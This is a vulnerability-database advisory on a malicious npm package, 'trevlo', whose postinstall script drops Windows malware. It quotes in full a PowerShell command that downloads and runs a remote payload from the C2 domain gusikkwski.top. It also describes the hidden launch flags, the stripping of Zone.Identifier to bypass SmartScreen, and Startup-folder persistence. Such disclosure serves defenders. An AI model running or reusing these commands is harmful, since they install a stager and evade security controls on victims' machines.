VDB
GCVE-110-OSM-2026-2238
GCVE-110-OSM-2026-2238
Advisory PublishedCVSS 9.6/10
Fetches and executes a remote PowerShell payload from `gusikkwski.top` at install time on Windows. Stage 2 downloads `HubSync387.exe` (52.7 MB PE64, WinosStager), strips Zone.Identifier to bypass SmartScreen, sets hidden attribute, and installs persistence in the Startup folder.
**Trigger** (`postinstall`): executes `node ./lib/configure.js` at install time.
**Platform gate**: exits immediately on non-Windows (`process.platform != 'win32'`).
**Stage 1 — PowerShell dropper**: constructs inline PowerShell command `[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;&([scriptblock]::Create(((Invoke-WebRequest -Uri 'https://gusikkwski.top/s/d89728b820e59b2ac5a78ece' -UseBasicParsing).Content)))`, encodes it as UTF-16LE base64, and launches it via `cmd.exe /d /s /c start "" powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand <b64>` in a detached, unreferenced child process.
**Stage 2 — EXE dropper** (fetched from C2 at `https://gusikkwski.top/s/d89728b820e59b2ac5a78ece`): downloads `HubSync387.exe` from `https://gusikkwski.top/dl/d89728b820e59b2ac5a78ece` with three write-path retries (Startup folder → %APPDATA% → %LOCALAPPDATA% → %TEMP%); removes `Zone.Identifier` ADS (`Remove-Item ($path+':Zone.Identifier')`) to defeat SmartScreen; sets hidden file attribute.
**Stage 3 — binary** (`HubSync387.exe`, 52.7 MB PE64, SHA256 `cb6567ca182b9ec02d50d76030838f36754e65aeb209e19e679d24634f6b276b`): masquerades as `node.exe`; VT 3/70; matched YARA rules WinosStager and skip20_sqllang_hook; consistent with appended-payload stager pattern.
**Persistence**: first write attempt targets `%STARTUP%\HubSync387.exe` — survives reboot.
**C2 infrastructure**: `gusikkwski.top` registered 2026-04-11 (2 days before package publish), NameSilo, Cloudflare-proxied, WHOIS privacy — purpose-built C2.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | trevlo | all versions (affected) | — |
Browse GCVE Records
72,921 records in the GCVE database · Updated July 15, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.